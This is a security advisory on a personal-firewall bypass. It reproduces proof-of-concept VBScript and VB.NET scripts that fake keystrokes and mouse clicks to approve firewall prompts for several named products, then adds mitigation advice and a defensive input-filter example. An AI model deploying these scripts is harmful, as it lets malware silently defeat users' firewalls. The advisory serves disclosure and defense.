Affected systems:
Zone Labs ZoneAlarm Pro 4.5.538.001
Zone Labs ZoneAlarm Pro 4.5
Symantec Norton Personal Firewall 2004
Symantec Norton Personal Firewall 2003
Symantec Norton Personal Firewall 2002
Kerio Personal Firewall 4.1.2
Kerio Personal Firewall 4.1.1
Kerio Personal Firewall 4.1.0
Description:
Most personal firewalls accept keyboard shortcuts or other interface-control input.
The access control implemented by most personal firewalls is flawed: a remote attacker can exploit this to bypass the firewall by controlling the mouse or sending keyboard shortcuts, and so gain full access to the system.
An attacker can build a VBScript script that simulates multithreading by launching a second instance of itself. While the first instance is connecting to the Internet, the second sends keyboard shortcuts to the firewall, which lets the attacker control the firewall's behavior and bypass its control.
The bypass can also be carried out by controlling the mouse. The program does not use real multithreading, because some firewalls interrupt the program's execution outright; instead it starts another instance of itself with a parameter, and that instance bypasses the firewall's control.
Using this issue, malicious programs such as Trojans can run a server listener or get direct access past the firewall without the firewall prompting the user.
<*Source: Ferruh Mavituna (ferruh@mavituna.com)
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=110478641332370&w=2
*>
Test method:
Warning: the following procedures (methods) may be offensive in nature and are intended for security research and teaching only. Use at your own risk!
Ferruh Mavituna (ferruh@mavituna.com) provides the following test method:
'********************************************************************
'// By Ferruh Mavituna
'// ferruh@mavituna.com, http://ferruh.mavituna.com
'********************************************************************
'// Date: 4/25/2004
'// Simple PoC for skipping Zone Alarm Firewall with SendKeys and multithreading
'// Related Advisory: Not Published Yet
'********************************************************************
' Modified for Agnitium Outpost Firewall 2.1.303.4009 (314)
' Tested: Agnitium Outpost Firewall 2.5.369.4608 (369)
' 5/5/2004
' 02.01.2005
' Ferruh Mavituna
' Const DELAY = 1000
' Const TIMES = 1
' Const EXTRADELAY = 0
'********************************************************************
Option Explicit
Dim argLen, shell, sendKeyMod, i, appName
Const DELAY = 1000
Const TIMES = 1
Const EXTRADELAY = 0
appName = WScript.ScriptName
' SendKey
sendKeyMod = False
argLen = WScript.Arguments.Length
If argLen > 0 Then sendKeyMod = True
Set shell = WScript.CreateObject("WScript.Shell")
If sendKeyMod Then
    ' First sleep for a while
    If EXTRADELAY > 0 Then WScript.Sleep EXTRADELAY
    ' Force
    While i < TIMES
        i = i + 1
        WScript.Sleep DELAY
        ' 1) First add it trusted
        shell.SendKeys "+{TAB}"   ' Go back once
        shell.SendKeys "{UP 2}"   ' Go up
        ' 1) Press Enter
        shell.SendKeys "{ENTER}"  ' Enter
    Wend
    ' Exit
    ' WScript.Echo "Exit!"
    WScript.Quit 1
End If
' WScript.Echo WScript.ScriptFullName
Call shell.Run(appName & " /send")
' Connect
WScript.Echo Connect("http://ferruh.mavituna.com") & " Mission Accomplished ..."
Set shell = Nothing
WScript.Quit 1

Function Connect(ByVal URL)
    Dim web
    Set web = CreateObject("Microsoft.XmlHttp")
    web.Open "HEAD", URL, False
    web.Send ""
    Connect = web.GetAllResponseHeaders
    Set web = Nothing
End Function

["Anti-Hacker.txt" (Text / Plain)]

'********************************************************************
'// By Ferruh Mavituna
'// ferruh@mavituna.com, http://ferruh.mavituna.com
'********************************************************************
'// Date: 4/25/2004
'// Simple PoC for bypassing multiple firewall products
'// Related Advisory: Not Published Yet
'********************************************************************
' History
' 3/5/2004
'   Added ZA
' 5/5/2004
'   Added Kerio, Outpost
' 6/5/2004
'   Added Kaspersky Anti-Hacker
'********************************************************************
Option Explicit
Dim arrKeys(5, 5), arrDelays(5, 2), arrRegistry(5, 1), intFirewall
Const EXTRADELAY = 0
Const DETERMINEFIREWALL = False ' Auto determine current firewall
'----------------------------------------------
' Define delays and times for firewalls
'----------------------------------------------
'// Firewalls
' ZoneAlarm Pro, 4.5.530 (tested Windows 2003 & WinXP)
Const ZONEALARM = 0
' Kerio 4.0.14
Const KERIO = 1
' Agnitium Outpost Firewall 2.1.303.4009 (314)
Const OUTPOST = 2
' Kaspersky Anti-Hacker 1.5.119.0
Const KASPERSKY = 3
' Select active firewall
intFirewall = KASPERSKY
'// Configuration
' Kaspersky Anti-Hacker
arrDelays(KASPERSKY, 0) = 1000
arrDelays(KASPERSKY, 1) = 1
' Define keys for firewalls
arrKeys(KASPERSKY, 0) = "{ENTER}"
If DETERMINEFIREWALL Then
    ' TODO: Read registries and determine it!
End If
Dim argLen, shell, sendKeyMod, i, j, appName
appName = WScript.ScriptName
' SendKey
sendKeyMod = False
argLen = WScript.Arguments.Length
If argLen > 0 Then sendKeyMod = True
Set shell = WScript.CreateObject("WScript.Shell")
If sendKeyMod Then
    ' First sleep for a while
    If EXTRADELAY > 0 Then WScript.Sleep EXTRADELAY
    ' Force
    While i < arrDelays(intFirewall, 1)
        i = i + 1
        WScript.Sleep arrDelays(intFirewall, 0)
        ' Send keys
        For j = 0 To UBound(arrKeys, 2)
            If arrKeys(intFirewall, j) <> "" Then
                shell.SendKeys arrKeys(intFirewall, j)
            End If
        Next
    Wend
    ' Exit
    ' WScript.Echo "Exit!"
    WScript.Quit 1
End If
' WScript.Echo WScript.ScriptFullName
Call shell.Run(appName & " /send")
' Connect
WScript.Echo Connect("http://ferruh.mavituna.com") & " Mission Accomplished ..."
Set shell = Nothing
WScript.Quit 1

Function Connect(ByVal URL)
    Dim web
    Set web = CreateObject("Microsoft.XmlHttp")
    web.Open "HEAD", URL, False
    web.Send ""
    Connect = web.GetAllResponseHeaders
    Set web = Nothing
End Function

["ZoneAlarm.txt" (Text / Plain)]

'********************************************************************
'// By Ferruh Mavituna
'// ferruh@mavituna.com, http://ferruh.mavituna.com
'********************************************************************
'// Date: 4/25/2004
'// Simple PoC for skipping Zone Alarm Firewall with SendKeys and multithreading
'// Related Advisory: Not Published Yet
'********************************************************************
Option Explicit
Dim argLen, shell, sendKeyMod, i
Const DELAY = 10
Const TIMES = 15
' SendKey
sendKeyMod = False
argLen = WScript.Arguments.Length
If argLen > 0 Then sendKeyMod = True
Set shell = WScript.CreateObject("WScript.Shell")
If sendKeyMod Then
    While i < TIMES
        i = i + 1
        WScript.Sleep DELAY
        shell.SendKeys "%r" ' Remember, do not ask again!
        shell.SendKeys "%y" ' Click Yes
    Wend
    ' Exit
    ' WScript.Echo "Exit!"
    WScript.Quit 1
End If
' WScript.Echo WScript.ScriptFullName
Call shell.Run("skipza.vbs /send")
' Connect
WScript.Echo Connect("http://ferruh.mavituna.com") & " Mission Accomplished ..."
Set shell = Nothing
WScript.Quit 1

Function Connect(ByVal URL)
    Dim web
    Set web = CreateObject("Microsoft.XmlHttp")
    web.Open "HEAD", URL, False
    web.Send ""
    Connect = web.GetAllResponseHeaders
    Set web = Nothing
End Function

["TestfireWall.txt" (Text / Plain)]

'********************************************************************
'// By Ferruh Mavituna
'// ferruh@mavituna.com, http://ferruh.mavituna.com
'********************************************************************
'// Date: 4/25/2004
'// Simple PoC for skipping Zone Alarm Firewall with SendKeys and multithreading
'// Simple firewall test file
'// Related Advisory: Not Published Yet
'********************************************************************
Option Explicit
Dim shell, sendKeyMod, result
Const URL = "http://ferruh.mavituna.com"
' Connect
WScript.Echo "Now I'll try to connect to" & URL
If Connect(URL, result) Then
    WScript.Echo "Mission Accomplished ..., here is the headers;" & vbNewLine & result
Else
    WScript.Echo "OK, I couldn't access to internet"
End If
Set shell = Nothing
WScript.Quit 1

Function Connect(ByVal URL, ByRef result)
    Connect = True
    On Error Resume Next
    Err.Clear
    Dim web
    Set web = CreateObject("Microsoft.XmlHttp")
    web.Open "HEAD", URL, False
    web.Send ""
    result = web.GetAllResponseHeaders
    Set web = Nothing
    If Err <> 0 Then Connect = False
End Function

["Norton.txt"]

'********************************************************************
'// By Ferruh Mavituna
'// ferruh@mavituna.com, http://ferruh.mavituna.com
'********************************************************************
'// Date: 4/25/2004
'// Simple PoC for skipping Zone Alarm Firewall with SendKeys and multithreading
'// Related Advisory: Not Published Yet
'********************************************************************
Option Explicit
Dim argLen, shell, sendKeyMod, i
Const DELAY = 10
Const TIMES = 15
' SendKey
sendKeyMod = False
argLen = WScript.Arguments.Length
If argLen > 0 Then sendKeyMod = True
Set shell = WScript.CreateObject("WScript.Shell")
If sendKeyMod Then
    While i < TIMES
        i = i + 1
        WScript.Sleep DELAY
        shell.SendKeys "%a" ' Remember, do not ask again!
        shell.SendKeys "%o" ' Click Yes
    Wend
    ' Customized for Norton FW by Oezguer Mavituna
    ' Exit
    ' WScript.Echo "Exit!"
    WScript.Quit 1
End If
' WScript.Echo WScript.ScriptFullName
Call shell.Run("skipza.vbs /send")
' Connect
WScript.Echo Connect("http://ferruh.mavituna.com") & " Mission Accomplished ..."
Set shell = Nothing
WScript.Quit 1

Function Connect(ByVal URL)
    Dim web
    Set web = CreateObject("Microsoft.XmlHttp")
    web.Open "HEAD", URL, False
    web.Send ""
    Connect = web.GetAllResponseHeaders
    Set web = Nothing
End Function

["MouseControl.txt" (Text / Plain)]

'********************************************************************
'// By Ferruh Mavituna
'// ferruh@mavituna.com, http://ferruh.mavituna.com
'********************************************************************
'// Date: 5/19/2004
'// Simple PoC for bypassing multiple firewall products
'// Code: VB.NET
'********************************************************************
' dwFlags is the first argument at every call site below
Private Declare Sub mouse_event Lib "user32" (ByVal dwFlags As Long, ByVal dx As Long, ByVal dy As Long, ByVal cButtons As Long, ByVal dwExtraInfo As Long)
Private Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)
Private Const MOUSEEVENTF_LEFTDOWN = &H2
Private Const MOUSEEVENTF_LEFTUP = &H4
Private Const MOUSEEVENTF_MIDDLEDOWN = &H20
Private Const MOUSEEVENTF_MIDDLEUP = &H40
Private Const MOUSEEVENTF_RIGHTDOWN = &H8
Private Const MOUSEEVENTF_RIGHTUP = &H10
Private Const SleepTime = 0.5 ' As second
Private Const SlowMotion = True ' Debug!
' Firewalls
Const ZoneAlarm As Integer = 0
' Set point
Dim arrFirewalls(1, 3) As Integer
Dim ActiveFirewall As Integer = ZoneAlarm

Private Sub SetupFirewalls()
    ' Get current screen
    ' This is just PoC; a real world example should automatically detect
    ' the installed firewall, change sleep times, care about exact position,
    ' taskbar position etc. But it's easy to write a real world example
    Dim screenY As Integer = Screen.PrimaryScreen.Bounds.Height
    Dim screenX As Integer = Screen.PrimaryScreen.Bounds.Width
    arrFirewalls(ZoneAlarm, 0) = screenX - 250 ' X Remember!
    arrFirewalls(ZoneAlarm, 1) = screenY - 130 ' Y
    arrFirewalls(ZoneAlarm, 2) = screenX - 190 ' Yes
    arrFirewalls(ZoneAlarm, 3) = screenY - 93
End Sub

Private Sub FirewallTest_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
    ' Hide app
    Me.ShowInTaskbar = False
    Me.Visible = False
    ' Args
    Dim flagArg As String = Application.ExecutablePath
    If Environment.GetCommandLineArgs().Length > 1 Then
        ' Sleep
        Sleep(SleepTime * 1000)
        ' Try
        SetupFirewalls()
        If SlowMotion Then Sleep(1000)
        ' First access
        BypassFirewall(arrFirewalls(ActiveFirewall, 0), arrFirewalls(ActiveFirewall, 1))
        If SlowMotion Then Sleep(1000)
        BypassFirewall(arrFirewalls(ActiveFirewall, 2), arrFirewalls(ActiveFirewall, 3))
        ' Gain access for HTTP
        Sleep(300)
        If SlowMotion Then Sleep(1000)
        BypassFirewall(arrFirewalls(ActiveFirewall, 0), arrFirewalls(ActiveFirewall, 1))
        If SlowMotion Then Sleep(1000)
        BypassFirewall(arrFirewalls(ActiveFirewall, 2), arrFirewalls(ActiveFirewall, 3))
        ' Quit!
        Me.Dispose()
    Else
        System.Diagnostics.Process.Start(flagArg, "Skipme")
        ' Access Internet
        If DownloadUrl() Then
            MessageBox.Show("Successed!, Firewall Bypassed!", "Firewall Bypassed!", MessageBoxButtons.OK, MessageBoxIcon.Warning)
        End If
        Me.Dispose()
    End If
End Sub

' Bypass PoC
Private Sub BypassFirewall(ByVal x As Integer, ByVal y As Integer)
    ' Save old positions for return!
    Dim oldX As Integer = Cursor.Position.X
    Dim oldY As Integer = Cursor.Position.Y
    ' Set new position
    Cursor.Position = New Point(x, y)
    ' Click
    mouse_event(MOUSEEVENTF_LEFTDOWN, 0, 0, 0, 0)
    mouse_event(MOUSEEVENTF_LEFTUP, 0, 0, 0, 0)
    ' Return
    Cursor.Position = New Point(oldX, oldY)
End Sub

' Connect Internet
Private Function DownloadUrl() As Boolean
    DownloadUrl = True
    Try
        Dim wc As New System.Net.WebClient()
        wc.DownloadFile("http://ferruh.mavituna.com", "c:/firewalltest.htm")
    Catch
        MessageBox.Show("Can Not Connected!", "Not Connected!", MessageBoxButtons.OK, MessageBoxIcon.Error)
        DownloadUrl = False
    End Try
End Function

["BypasssendKey.txt" (Text / Plain)]

'********************************************************************
'// By Ferruh Mavituna
'// ferruh@mavituna.com, http://ferruh.mavituna.com
'********************************************************************
'// Date: 4/25/2004
'// Simple PoC for bypassing multiple firewall products
'********************************************************************
' History
' 3/5/2004
'   Added ZA
' 5/5/2004
'   Added Kerio, Outpost
' 6/5/2004
'   Added Kaspersky Anti-Hacker
' 5/9/2004
'   Looknstop
' 5/20/2004
'   Norton
'********************************************************************
Option Explicit
Dim arrKeys(5, 5), arrDelays(5, 2), arrRegistry(5, 1), intFirewall
Const EXTRADELAY = 0
Const DETERMINEFIREWALL = False ' Auto determine current firewall
'----------------------------------------------
' Define delays and times for firewalls
'----------------------------------------------
'// Firewalls
' ZoneAlarm Pro, 4.5.530 (tested Windows 2003 & WinXP) | www.zonelabs.com
Const ZONEALARM = 0
' Kerio 4.0.14
Const KERIO = 1
' Agnitium Outpost Firewall 2.3.303.4009 (314) | www.agnitium.com
Const OUTPOST = 2
' Kaspersky Anti-Hacker 1.5.119.0 | www.kaspersky.com
Const KASPERSKY = 3
' Look 'n' Stop 2.04p2 | www.looknstop.com
Const LOOKNSTOP = 4
' Norton | www.norton.com
Const NORTON = 5
' Select active firewall
intFirewall = ZONEALARM
'// Configuration
' Define keys, delays, repeat times for firewalls
' Kaspersky Anti-Hacker
arrDelays(KASPERSKY, 0) = 400
arrDelays(KASPERSKY, 1) = 2
arrKeys(KASPERSKY, 0) = "{ENTER}" ' Just say OK
' ZoneAlarm
arrDelays(ZONEALARM, 0) = 10
arrDelays(ZONEALARM, 1) = 15
arrKeys(ZONEALARM, 0) = "%r" ' Select Remember
arrKeys(ZONEALARM, 1) = "%y" ' Yes
' Outpost
arrDelays(OUTPOST, 0) = 1000
arrDelays(OUTPOST, 1) = 1
arrKeys(OUTPOST, 0) = "+{TAB}" ' Go back once
arrKeys(OUTPOST, 1) = "{UP 2}" ' Go up
arrKeys(OUTPOST, 2) = "{ENTER}" ' Enter (index 2, so "{UP 2}" is not overwritten)
' Kerio
arrDelays(KERIO, 0) = 100
arrDelays(KERIO, 1) = 10
arrKeys(KERIO, 0) = " " ' Space - Remember, do not ask again!
arrKeys(KERIO, 1) = "%P" ' Yes
' Looknstop
arrDelays(LOOKNSTOP, 0) = 1000
arrDelays(LOOKNSTOP, 1) = 1
arrKeys(LOOKNSTOP, 0) = "(%{TAB})" ' Authorize
arrKeys(LOOKNSTOP, 1) = "{LEFT}" ' Left
arrKeys(LOOKNSTOP, 2) = "" ' Key string not recoverable from the source text
' Norton
arrDelays(NORTON, 0) = 100
arrDelays(NORTON, 1) = 5
arrKeys(NORTON, 0) = "%a" ' Allow
arrKeys(NORTON, 1) = "%O" ' OK
If DETERMINEFIREWALL Then
    ' TODO: Read registries and determine it!
End If
Dim argLen, shell, sendKeyMod, i, j, appName
appName = WScript.ScriptName
' SendKey
sendKeyMod = False
argLen = WScript.Arguments.Length
If argLen > 0 Then sendKeyMod = True
Set shell = WScript.CreateObject("WScript.Shell")
If sendKeyMod Then
    ' First sleep for a while
    If EXTRADELAY > 0 Then WScript.Sleep EXTRADELAY
    ' Force
    While i < arrDelays(intFirewall, 1)
        i = i + 1
        WScript.Sleep arrDelays(intFirewall, 0)
        ' Send keys
        For j = 0 To UBound(arrKeys, 2)
            If arrKeys(intFirewall, j) <> "" Then
                shell.SendKeys arrKeys(intFirewall, j)
            End If
        Next
    Wend
    ' Exit
    ' WScript.Echo "Exit!"
    WScript.Quit 1
End If
' WScript.Echo WScript.ScriptFullName
Call shell.Run(appName & " /send")
' Connect
WScript.Echo Connect("http://ferruh.mavituna.com") & " Mission Accomplished ..."
Set shell = Nothing
WScript.Quit 1

Function Connect(ByVal URL)
    Dim web
    Set web = CreateObject("Microsoft.XmlHttp")
    web.Open "HEAD", URL, False
    web.Send ""
    Connect = web.GetAllResponseHeaders
    Set web = Nothing
End Function

["Kerio.txt" (Text / Plain)]

'********************************************************************
'// By Ferruh Mavituna
'// ferruh@mavituna.com, http://ferruh.mavituna.com
'********************************************************************
'// Date: 4/25/2004
'// Simple PoC for skipping Zone Alarm Firewall with SendKeys and multithreading
'// Related Advisory: Not Published Yet
'********************************************************************
' Modified for Kerio 4.0.14
' 5/5/2004
' Ferruh Mavituna
' Const DELAY = 100
' Const TIMES = 10
'********************************************************************
Option Explicit
Dim argLen, shell, sendKeyMod, i, appName
Const DELAY = 100
Const TIMES = 10
appName = WScript.ScriptName
' SendKey
sendKeyMod = False
argLen = WScript.Arguments.Length
If argLen > 0 Then sendKeyMod = True
Set shell = WScript.CreateObject("WScript.Shell")
If sendKeyMod Then
    While i < TIMES
        i = i + 1
        WScript.Sleep DELAY
        shell.SendKeys " "  ' Remember, do not ask again!
        shell.SendKeys "%P" ' Click Yes
    Wend
    ' Exit
    ' WScript.Echo "Exit!"
    WScript.Quit 1
End If
' WScript.Echo WScript.ScriptFullName
Call shell.Run(appName & " /send")
' Connect
WScript.Echo Connect("http://ferruh.mavituna.com") & " Mission Accomplished ..."
Set shell = Nothing
WScript.Quit 1

Function Connect(ByVal URL)
    Dim web
    Set web = CreateObject("Microsoft.XmlHttp")
    web.Open "HEAD", URL, False
    web.Send ""
    Connect = web.GetAllResponseHeaders
    Set web = Nothing
End Function

Suggestion:
Temporary solution:
If you cannot install the patch or upgrade immediately, NSFOCUS recommends that you take the following steps to reduce the threat:
* Require a password for every allow action.
Vendor patch:
Zone Labs
---------
The Zone Labs team has provided the latest version to fix this vulnerability:
http://www.zonelabs.com/
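
The test scripts above answer the firewall's prompt with synthesized keystrokes (SendKeys) and mouse clicks (mouse_event). As an added example, not part of the original advisory or of any vendor's fix, the C code below shows one way a prompt could refuse such input: Windows low-level input hooks mark software-generated events with LLKHF_INJECTED / LLMHF_INJECTED. The names should_block, g_prompt_visible, kbd_filter, mouse_filter and install_input_filter are hypothetical; the Windows-only part is guarded so the decision function also builds on other systems.

```c
/* Added example: drop synthesized input while a firewall prompt is shown. */
#include <stdint.h>
#ifdef _WIN32
#include <windows.h>
#else
/* Flag values documented for KBDLLHOOKSTRUCT.flags and MSLLHOOKSTRUCT.flags,
   repeated here so the decision logic compiles off Windows. */
#define LLKHF_INJECTED 0x00000010u
#define LLMHF_INJECTED 0x00000001u
#endif

enum input_source { SRC_KEYBOARD, SRC_MOUSE };

/* Returns 1 when the event must be swallowed: a prompt is on screen and the
   event was generated by software (SendKeys, keybd_event, mouse_event,
   SendInput) rather than by a physical device. */
int should_block(enum input_source src, uint32_t flags, int prompt_visible)
{
    uint32_t injected = (src == SRC_KEYBOARD) ? LLKHF_INJECTED : LLMHF_INJECTED;
    return prompt_visible && (flags & injected) != 0;
}

#ifdef _WIN32
/* Hypothetical flag: set to 1 by the prompt code while the dialog is shown. */
static volatile LONG g_prompt_visible;

static LRESULT CALLBACK kbd_filter(int code, WPARAM wp, LPARAM lp)
{
    if (code == HC_ACTION) {
        const KBDLLHOOKSTRUCT *k = (const KBDLLHOOKSTRUCT *)lp;
        if (should_block(SRC_KEYBOARD, k->flags, g_prompt_visible))
            return 1;               /* non-zero: the event is not delivered */
    }
    return CallNextHookEx(NULL, code, wp, lp);
}

static LRESULT CALLBACK mouse_filter(int code, WPARAM wp, LPARAM lp)
{
    if (code == HC_ACTION) {
        const MSLLHOOKSTRUCT *m = (const MSLLHOOKSTRUCT *)lp;
        if (should_block(SRC_MOUSE, m->flags, g_prompt_visible))
            return 1;
    }
    return CallNextHookEx(NULL, code, wp, lp);
}

/* Call from a thread that runs a message loop; returns 1 on success. */
int install_input_filter(void)
{
    HINSTANCE self = GetModuleHandleW(NULL);
    return SetWindowsHookExW(WH_KEYBOARD_LL, kbd_filter, self, 0) != NULL
        && SetWindowsHookExW(WH_MOUSE_LL, mouse_filter, self, 0) != NULL;
}
#endif
```

Assistive tools such as on-screen keyboards also produce injected events, which is why the filter only acts while the prompt is visible. The password requirement recommended above does not depend on this check.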